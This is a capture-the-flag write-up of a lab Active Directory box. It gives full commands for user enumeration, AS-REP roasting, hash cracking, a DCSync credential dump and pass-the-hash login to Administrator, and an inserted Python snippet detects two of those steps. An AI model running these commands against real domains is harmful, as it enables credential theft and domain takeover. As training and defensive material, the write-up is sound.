Attacktive Directory on TryHackMe

Before all

Link on TryHackMe: https://tryhackme.com/room/attacktivedirectory
What is AD?
Introduction on Wikipedia

I once attended Mars's AD course at the 台灣好厲駭 program, but since it was my first exposure and there was an explosive amount of material, I honestly didn't absorb much (concepts, at most). I just happened to see a bunch of AD boxes on TryHackMe, so let's go hit them~

This machine sits in an AD network environment; it plays the role of a Kerberos DC (Domain Controller).
Although this is a bit of hindsight, the attack chain for this box is:

:::info
Dictionary attack to find usernames -> crack svc-admin's password from the TGT -> log in to SMB as svc-admin and find the backup file containing user backup's password -> as backup, dump every user's hash via DRSUAPI -> log in as Administrator with a Pass the Hash attack
:::

Victim’s IP : 10.10.162.250
Victim’s Host : spookysec.local
Attacker’s IP : 10.9.195.189

Note: remember to edit /etc/hosts to map the host name.

Write Up

RECON

nmap

Command
nmap -sC -sV -Pn 10.10.162.250
Result

```text
Nmap scan report for 10.10.162.143
Host is up (0.29s latency).
Not shown: 987 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
|_http-title: IIS Windows Server
| http-methods:
|_ Potentially risky methods: TRACE
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-03-03 08:36:16Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: spookysec.local0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: spookysec.local0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
3389/tcp open ms-wbt-server Microsoft Terminal Services
| ssl-cert: Subject: commonName=AttacktiveDirectory.spookysec.local
| Not valid before: 2024-03-02T08:23:05
|_Not valid after: 2024-09-01T08:23:05
|_ssl-date: 2024-03-03T08:36:43+00:00; +1s from scanner time.
| rdp-ntlm-info:
| Target_Name: THM-AD
| NetBIOS_Domain_Name: THM-AD
| NetBIOS_Computer_Name: ATTACKTIVEDIREC
| DNS_Domain_Name: spookysec.local
| DNS_Computer_Name: AttacktiveDirectory.spookysec.local
| Product_Version: 10.0.17763
|_ System_Time: 2024-03-03T08:36:34+00:00
Service Info: Host: ATTACKTIVEDIREC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time:
| date: 2024-03-03T08:36:37
|_ start_date: N/A
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
|_clock-skew: mean: 1s, deviation: 0s, median: 0s
```

Analyze
There are SMB and RDP services; the overall architecture is an AD network, and the host name is spookysec.local.

enum4linux

Command
enum4linux -a spookysec.local
Result: (screenshots)

Lots of user data gets dumped out.
We also obtain the NetBIOS name, THM-AD (though, judging from the later steps, it isn't much use...).

kerbrute

A new tool; you can download it from GitHub:
Click Me : https://github.com/ropnop/kerbrute/releases

Attack using the userlist.txt provided by the room (a password.txt is also provided for the hash cracking later).
Command:

```bash
kerbrute userenum --dc 10.10.184.186 -d spookysec.local usernames.txt
```

Result: (screenshot)

Exploit

First, install the Impacket toolkit:

```bash
git clone https://github.com/SecureAuthCorp/impacket.git /opt/impacket
pip3 install -r /opt/impacket/requirements.txt
cd /opt/impacket/ && python3 ./setup.py install
```

You may need sudo (many of the later attack steps need it too, so I won't repeat this).

TGT Attack with svc-admin

The idea behind obtaining the TGT is, roughly, to hijack messages during Kerberos authentication… (I think?)
Note that my working directory at this point is /opt/impacket/examples.
Use Impacket's GetNPUsers.py to carry out the attack.
Command

```bash
python3 GetNPUsers.py spookysec.local/svc-admin -no-pass
```

Result: (screenshot)

password cracking
Drop the result from the previous step into a file named pass:
john pass --wordlist=passwordlist.txt

SMB to get backup’s password

There isn't much to this step: with the password of svc-hosts obtained just now, log in to the SMB service.

smbclient -U svc-admin //10.10.162.143/backup


Password get!!


backup to Administrator

Use secretsdump.py from Impacket with backup's privileges to dump every user's password hash.
Command
sudo python3 secretsdump.py -just-dc backup@spookysec.local
Result: (screenshot)
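As an added example (not part of the original writeup), here is detection logic from the defender's side for two steps of this chain: a TGT issued without pre-authentication (the GetNPUsers.py step, Windows Event ID 4768 with Pre-Authentication Type 0) and directory replication rights exercised by an ordinary user account (the secretsdump.py -just-dc step, Event ID 4662). The event IDs and rights GUIDs are the standard Windows ones; the log lines and their key=value format are constructed for this example.

```python
# Control-access rights a DCSync (DRSUAPI replication) request exercises on the domain object
DS_REPL_GET_CHANGES = "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2"
DS_REPL_GET_CHANGES_ALL = "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2"

# Constructed sample events (not real DC logs) in a simplified key=value format. Lines 1 and 4
# mirror the chain above: an AS-REP for svc-admin without pre-auth, and 'backup' replicating.
SAMPLE_LOG = """
EventID=4768; TargetUserName=svc-admin; PreAuthType=0; TicketEncryptionType=0x17; IpAddress=10.9.195.189
EventID=4768; TargetUserName=james; PreAuthType=2; TicketEncryptionType=0x12; IpAddress=10.10.162.20
EventID=4662; SubjectUserName=ATTACKTIVEDIREC$; Properties={1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}
EventID=4662; SubjectUserName=backup; Properties=Control Access {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}
"""

def parse_event(line):
    """Split 'key=value; key=value' into a dict (the constructed format above)."""
    fields = {}
    for part in line.split(";"):
        key, _, value = part.partition("=")
        fields[key.strip()] = value.strip()
    return fields

def classify(event):
    """Return an alert string for one event, or None if it looks benign."""
    eid = event.get("EventID")
    if eid == "4768" and event.get("PreAuthType") == "0":
        # Pre-Authentication Type 0 = TGT issued without pre-auth, which is what GetNPUsers.py
        # relies on; 0x17 (RC4) AS-REPs are the kind john cracked with a wordlist above.
        enc = event.get("TicketEncryptionType", "?")
        return (f"AS-REP roasting candidate: {event.get('TargetUserName')} "
                f"enc={enc} from {event.get('IpAddress', '?')}")
    if eid == "4662" and not event.get("SubjectUserName", "").endswith("$"):
        # Only DC computer accounts (names ending in '$') should replicate; a user like 'backup'
        # exercising these rights matches secretsdump -just-dc. 4662 needs a SACL on the domain object.
        props = event.get("Properties", "").lower()
        if DS_REPL_GET_CHANGES in props or DS_REPL_GET_CHANGES_ALL in props:
            return f"DCSync candidate: {event.get('SubjectUserName')}"
    return None

def detect(lines):
    """Run classify() over log lines and return the non-empty alerts in order."""
    events = (parse_event(line) for line in lines if line.strip())
    return [alert for alert in map(classify, events) if alert]

if __name__ == "__main__":
    for alert in detect(SAMPLE_LOG.splitlines()):
        print(alert)
```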

With the password hash in hand, log in as admin via a Pass the Hash attack.

What is a pass the hash attack?
Read this: https://wwwstar.medium.com/%E5%85%A7%E7%B6%B2%E6%BB%B2%E9%80%8F-pass-the-hash-pth-%E6%94%BB%E6%93%8A%E6%89%8B%E6%B3%95%E5%8F%8A%E9%98%B2%E7%A6%A6-%E5%81%B5%E6%B8%AC%E6%8E%AA%E6%96%BD-e1d15e807a67

Use the evil-winrm tool to perform Pass the Hash and log in directly.
Command
evil-winrm -i 10.10.88.124 -u Administrator -H 0e0363213e37b94221497260b0bcb4fc

Result: (screenshot)

RCE!!!
How to confirm your own identity inside AD:
Get-ADUser -Identity "Administrator" -Properties *

After all

After this box I feel I picked up quite a few techniques. There's still a huge, huge amount of AD to learn, so I'll keep working at it w
Attached: RDP, which was of no use for this box, but I set it up anyway to make the most of things.
(screenshot)

The hacker's romance~
Good night :>